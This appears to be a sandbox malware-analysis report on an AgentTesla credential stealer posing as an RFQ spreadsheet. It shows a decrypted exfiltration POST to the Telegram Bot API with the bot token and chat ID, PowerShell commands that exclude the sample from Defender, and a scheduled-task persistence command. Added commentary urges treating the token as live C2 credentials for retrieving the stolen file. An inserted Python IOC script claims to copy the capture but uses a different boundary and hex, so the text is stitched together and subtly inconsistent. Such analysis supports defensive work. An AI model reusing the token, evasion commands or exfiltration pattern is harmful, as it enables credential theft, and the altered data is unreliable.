                                            {"ok":true,"result":{"message_id":281,"from":{"id":7156462915,"is_bot":true,"first_name":"$dollars","username":"LobgddhysBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1716391618,"document":{"file_name":"user-302494 2024-05-22 11-26-56.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBGWZODsI59_fJJBVLMdnMz-HAjcJhAAJ9BAAC0g9wRphLhTPK4IGENQQ","file_unique_id":"AgADfQQAAtIPcEY","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/22/2024 11:26:56\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
                                            Reading the exchange: the bot token is carried in the URL path (bot id 7156462915; the reply names the bot LobgddhysBot), the chat_id form field 7062075018 (a private chat the reply labels "ISIKA") is the operator's inbox, and the uploaded document is a 320-byte HTML file named user-302494 2024-05-22 11-26-56.html with the host fingerprint (user name, OS, CPU, RAM) in the caption. The report shows only the first 255 bytes of the 918-byte multipart body. Three clocks appear in this section: packet timestamps in CEST, the session log in UTC, and the caption time (11:26:56) from the victim VM's local clock, which is also the clock used by the process start times below. Token plus file_id are sufficient to retrieve the uploaded document again through the Bot API getFile method, so treat them as live C2 credentials rather than as strings to block.


                                            HTTPS session (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process)
                                            1 | 192.168.2.5 | 49712 | 149.154.167.220 | 443 | 7448 | C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Decrypted traffic (Timestamp | Bytes transferred | Direction | Data)
                                            2024-05-22 15:27:00 UTC | 260 | OUT | POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8dc7a521867a3ca
                                            Host: api.telegram.org
                                            Content-Length: 918
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-05-22 15:27:00 UTC | 25 | IN | HTTP/1.1 100 Continue
                                            2024-05-22 15:27:00 UTC | 918 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 38 36 37 61 33 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 30 37 35 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 38 36 37 61 33 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 32 2f 32 30 32 34 20 31 31 3a 32 36 3a 35 39 0a 55 73 65 72
                                            Data Ascii: -----------------------------8dc7a521867a3caContent-Disposition: form-data; name="chat_id"7062075018-----------------------------8dc7a521867a3caContent-Disposition: form-data; name="caption"New PW Recovered!Time: 05/22/2024 11:26:59User
                                            2024-05-22 15:27:01 UTC | 1007 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 22 May 2024 15:27:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 619
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":true,"result":{"message_id":282,"from":{"id":7156462915,"is_bot":true,"first_name":"$dollars","username":"LobgddhysBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1716391621,"document":{"file_name":"user-302494 2024-05-22 11-26-59.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBGmZODsUfN098HnzqovpPuiNFoxQhAAJ-BAAC0g9wRpS5in9_t5MmNQQ","file_unique_id":"AgADfgQAAtIPcEY","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/22/2024 11:26:59\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
                                            Same bot token and same chat_id, this time from the persistence copy C:\Users\user\AppData\Roaming\ywKDUBCUA.exe (PID 7448, message_id 282, caption time 11:26:59): the dropped file is the identical binary (same MD5 in the process records below) and repeats the credential harvest as soon as it starts, three seconds after the original's upload.
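The two sessions above are the entire C2 channel, so the fields worth pulling out of such a capture are the bot token, the chat_id and the reply's echo of both. The following Python is an added example (mine, not code from the Joe Sandbox report or from AgentTesla) that decodes the "Data Raw" hex dump of session 0 as multipart/form-data, copes with the truncated body the report shows, and cross-checks the request against the JSON reply. The request line, headers, hex body and JSON are copied from session 0 above; the function names are my own.

```python
"""IOC extraction for the Telegram Bot API exfil session above (added example,
not code from the Joe Sandbox report or from the malware). The request line,
headers, "Data Raw" hex and JSON reply are copied from session 0; the report
shows only the first 255 of 918 body bytes, so the decoder must survive a
truncated last part. Function names are my own."""
import json
import re
from typing import Dict, Optional, Tuple

REQUEST_LINE = "POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1"
REQUEST_HEADERS = {
    "Host": "api.telegram.org",
    "Content-Type": "multipart/form-data; boundary=---------------------------8dc7a52168f7017",
    "Content-Length": "918",
}
BODY_HEX = (  # 16 bytes per row; the first two rows are CRLF plus the 29-dash delimiter
    "0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d "
    "2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 "
    "64 63 37 61 35 32 31 36 38 66 37 30 31 37 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 "
    "69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a "
    "0d 0a 37 30 36 32 30 37 35 30 31 38 0d 0a 2d 2d "
    "2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d "
    "2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 "
    "35 32 31 36 38 66 37 30 31 37 0d 0a 43 6f 6e 74 "
    "65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a "
    "20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 "
    "3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 "
    "77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a "
    "0a 54 69 6d 65 3a 20 30 35 2f 32 32 2f 32 30 32 "
    "34 20 31 31 3a 32 36 3a 35 36 0a 55 73 65 72"
)
RESPONSE_JSON = (  # raw strings keep the \n escapes JSON expects
    r'{"ok":true,"result":{"message_id":281,"from":{"id":7156462915,"is_bot":true,'
    r'"first_name":"$dollars","username":"LobgddhysBot"},"chat":{"id":7062075018,'
    r'"first_name":"ISIKA","type":"private"},"date":1716391618,"document":{"file_name":'
    r'"user-302494 2024-05-22 11-26-56.html","mime_type":"text/html","file_id":'
    r'"BQACAgEAAxkDAAIBGWZODsI59_fJJBVLMdnMz-HAjcJhAAJ9BAAC0g9wRphLhTPK4IGENQQ",'
    r'"file_unique_id":"AgADfQQAAtIPcEY","file_size":320},"caption":"New PW Recovered!'
    r'\n\nTime: 05/22/2024 11:26:56\nUser Name: user/302494\nOSFullName: Microsoft '
    r'Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}'
)

# Bot API calls embed the token in the path: /bot<numeric bot id>:<secret>/<method>
BOT_REQUEST = re.compile(
    r"^[A-Z]+ /bot(?P<token>(?P<bot_id>\d+):[A-Za-z0-9_-]+)/(?P<api>\w+) HTTP/1\.[01]$")


def parse_bot_request(request_line: str, headers: Dict[str, str]) -> Optional[dict]:
    """Return bot id, token and API method if this is a Telegram Bot API call."""
    if headers.get("Host", "").lower() != "api.telegram.org":
        return None
    m = BOT_REQUEST.match(request_line)
    if m is None:
        return None
    return {"bot_id": m["bot_id"], "token": m["token"], "api_method": m["api"]}


def multipart_fields(body: bytes, content_type: str) -> Tuple[Dict[str, str], bool]:
    """Decode multipart/form-data into {name: value}; also report a cut-off last part."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if m is None:
        raise ValueError("no multipart boundary in Content-Type")
    delim = b"--" + m.group(1).encode()
    chunks = body.split(delim)
    if len(chunks) < 2:
        raise ValueError("declared boundary does not occur in body")
    fields: Dict[str, str] = {}
    truncated = False
    for chunk in chunks[1:]:          # chunks[0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):   # "--boundary--" closes the message
            break
        head, sep, value = chunk.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', head) if sep else None
        if name is None:
            continue
        if value.endswith(b"\r\n"):
            value = value[:-2]        # the CRLF that precedes the next delimiter
        else:
            truncated = True          # capture ended inside this part
        fields[name.group(1).decode()] = value.decode("utf-8", "replace")
    return fields, truncated


def extract_iocs(request_line: str, headers: Dict[str, str],
                 body_hex: str, response_json: str) -> dict:
    """Combine request fields with what the server's reply confirms."""
    req = parse_bot_request(request_line, headers)
    if req is None:
        return {}
    body = bytes.fromhex(body_hex)
    fields, truncated = multipart_fields(body, headers["Content-Type"])
    result = json.loads(response_json).get("result", {})
    doc = result.get("document", {})
    return {
        **req,
        "chat_id": fields.get("chat_id"),
        "caption_first_line": fields.get("caption", "").split("\n", 1)[0],
        "body_truncated": truncated or len(body) < int(headers.get("Content-Length", "0")),
        "bot_username": result.get("from", {}).get("username"),
        # the reply echoes the recipient chat; it must match the chat_id the bot was given
        "chat_id_confirmed": str(result.get("chat", {}).get("id")) == fields.get("chat_id"),
        "exfil_file": doc.get("file_name"),
        "exfil_size": doc.get("file_size"),
    }
```

Calling extract_iocs(REQUEST_LINE, REQUEST_HEADERS, BODY_HEX, RESPONSE_JSON) yields the bot id, token, chat_id and the exfiltrated file name and size, with body_truncated set because the dump ends inside the caption part. The decoder deliberately uses the boundary declared in Content-Type rather than guessing it from the body; a capture whose declared boundary is absent raises instead of silently returning nothing.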


                                            Target ID:0
                                            Start time:11:26:51
                                            Start date:22/05/2024
                                            Path:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0x4a0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0x510000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x510000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
                                            Imagebase:0xe80000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0xdf0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Target ID:10
                                            Start time:11:26:55
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Imagebase:0xd00000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 83%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:11
                                            Start time:11:26:56
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff6ef0c0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
                                            Imagebase:0xe80000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x420000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:15
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x360000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:16
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x5c0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:12.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:9.3%
                                              Total number of Nodes:108
                                              Total number of Limit Nodes:10
                                              execution_graph 29308 e94668 29309 e94672 29308->29309 29311 e94759 29308->29311 29312 e9477d 29311->29312 29316 e94868 29312->29316 29320 e94858 29312->29320 29318 e9488f 29316->29318 29317 e9496c 29317->29317 29318->29317 29324 e944b4 29318->29324 29322 e94868 29320->29322 29321 e9496c 29321->29321 29322->29321 29323 e944b4 CreateActCtxA 29322->29323 29323->29321 29325 e958f8 CreateActCtxA 29324->29325 29327 e959bb 29325->29327 29327->29327 29367 48c022d 29368 48c00d4 29367->29368 29369 48c00e3 29368->29369 29372 48c3008 29368->29372 29378 48c2ff9 29368->29378 29373 48c301d 29372->29373 29385 48c303a 29373->29385 29391 48c3048 29373->29391 29397 48c30a6 29373->29397 29374 48c302f 29374->29369 29379 48c2fb3 29378->29379 29380 48c3007 29378->29380 29379->29369 29382 48c3048 CreateProcessA 29380->29382 29383 48c303a CreateProcessA 29380->29383 29384 48c30a6 CreateProcessA 29380->29384 29381 48c302f 29381->29369 29382->29381 29383->29381 29384->29381 29386 48c3048 29385->29386 29389 48c3086 29386->29389 29404 48c3446 29386->29404 29409 48c3350 29386->29409 29414 48c3360 29386->29414 29389->29374 29392 48c3062 29391->29392 29393 48c3086 29392->29393 29394 48c3446 CreateProcessA 29392->29394 29395 48c3360 CreateProcessA 29392->29395 29396 48c3350 CreateProcessA 29392->29396 29393->29374 29394->29393 29395->29393 29396->29393 29398 48c3034 29397->29398 29400 48c30a9 29397->29400 29399 48c3086 29398->29399 29401 48c3446 CreateProcessA 29398->29401 29402 48c3360 CreateProcessA 29398->29402 29403 48c3350 CreateProcessA 29398->29403 29399->29374 29400->29374 29401->29399 29402->29399 29403->29399 29406 48c3414 29404->29406 29405 48c3431 29405->29389 29406->29405 29419 6bffc48 29406->29419 29411 48c3360 29409->29411 29410 48c3431 29410->29389 29411->29410 29413 6bffc48 CreateProcessA 29411->29413 29412 48c34d1 29412->29389 29413->29412 29416 48c3393 29414->29416 29415 48c3431 29415->29389 29416->29415 29418 6bffc48 CreateProcessA 
29416->29418 29417 48c34d1 29417->29389 29418->29417 29420 6bffcd1 CreateProcessA 29419->29420 29422 6bffe93 29420->29422 29423 e9d5c8 DuplicateHandle 29424 e9d65e 29423->29424 29328 48c4218 29329 48c423e 29328->29329 29330 48c43a3 29328->29330 29329->29330 29332 48c26f0 29329->29332 29333 48c4498 PostMessageW 29332->29333 29334 48c4504 29333->29334 29334->29329 29441 48c0174 29443 48c00d4 29441->29443 29442 48c022a 29444 48c00e3 29443->29444 29445 48c3008 CreateProcessA 29443->29445 29446 48c2ff9 CreateProcessA 29443->29446 29445->29442 29446->29442 29335 e9aff0 29336 e9afff 29335->29336 29339 e9b0e8 29335->29339 29347 e9b0d8 29335->29347 29340 e9b0f9 29339->29340 29341 e9b11c 29339->29341 29340->29341 29355 e9b380 29340->29355 29359 e9b370 29340->29359 29341->29336 29342 e9b114 29342->29341 29343 e9b320 GetModuleHandleW 29342->29343 29344 e9b34d 29343->29344 29344->29336 29348 e9b0f9 29347->29348 29349 e9b11c 29347->29349 29348->29349 29353 e9b380 LoadLibraryExW 29348->29353 29354 e9b370 LoadLibraryExW 29348->29354 29349->29336 29350 e9b114 29350->29349 29351 e9b320 GetModuleHandleW 29350->29351 29352 e9b34d 29351->29352 29352->29336 29353->29350 29354->29350 29356 e9b394 29355->29356 29358 e9b3b9 29356->29358 29363 e9ad9c 29356->29363 29358->29342 29361 e9b380 29359->29361 29360 e9b3b9 29360->29342 29361->29360 29362 e9ad9c LoadLibraryExW 29361->29362 29362->29360 29364 e9b560 LoadLibraryExW 29363->29364 29366 e9b5d9 29364->29366 29366->29358 29431 e9d380 29432 e9d3c6 GetCurrentProcess 29431->29432 29434 e9d418 GetCurrentThread 29432->29434 29437 e9d411 29432->29437 29435 e9d44e 29434->29435 29436 e9d455 GetCurrentProcess 29434->29436 29435->29436 29440 e9d48b 29436->29440 29437->29434 29438 e9d4b3 GetCurrentThreadId 29439 e9d4e4 29438->29439 29440->29438

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 343 6bf5230-6bf5258 344 6bf525f-6bf5354 343->344 345 6bf525a 343->345 350 6bf597b-6bf5987 344->350 345->344 351 6bf598d-6bf5994 350->351 352 6bf5359-6bf5365 350->352 353 6bf536c-6bf53b8 352->353 354 6bf5367 352->354 357 6bf5428-6bf542c 353->357 354->353 358 6bf542e-6bf5460 357->358 359 6bf53ba-6bf53d8 357->359 368 6bf548a 358->368 369 6bf5462-6bf546e 358->369 362 6bf53ea-6bf53f0 359->362 363 6bf53da-6bf53e8 359->363 365 6bf541f-6bf5423 362->365 363->358 366 6bf5425 365->366 367 6bf53f2-6bf53fe 365->367 366->357 372 6bf5405-6bf540d 367->372 373 6bf5400 367->373 374 6bf5490-6bf54bd 368->374 370 6bf5478-6bf547e 369->370 371 6bf5470-6bf5476 369->371 376 6bf5488 370->376 371->376 377 6bf540f-6bf541a 372->377 378 6bf541c 372->378 373->372 380 6bf54bf-6bf54f7 374->380 381 6bf550c-6bf55a2 374->381 376->374 377->366 378->365 386 6bf5952-6bf5978 380->386 392 6bf55f3-6bf55f9 381->392 386->350 393 6bf55fb-6bf56bd 392->393 394 6bf55a4-6bf55c3 392->394 405 6bf56bf-6bf56f8 393->405 406 6bf56fe-6bf5702 393->406 395 6bf55ca-6bf55f0 394->395 396 6bf55c5 394->396 395->392 396->395 405->406 407 6bf5704-6bf573d 406->407 408 6bf5743-6bf5747 406->408 407->408 409 6bf5749-6bf5782 408->409 410 6bf5788-6bf578c 408->410 409->410 413 6bf578e-6bf5796 410->413 414 6bf57e5-6bf5840 410->414 416 6bf57dd-6bf57e3 413->416 421 6bf5877-6bf58a1 414->421 422 6bf5842-6bf5875 414->422 416->414 418 6bf5798-6bf57da 416->418 418->416 426 6bf58aa-6bf5929 421->426 422->426 430 6bf5930-6bf5943 426->430 430->386
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$:$pgq$~
                                              • API String ID: 0-1276774758
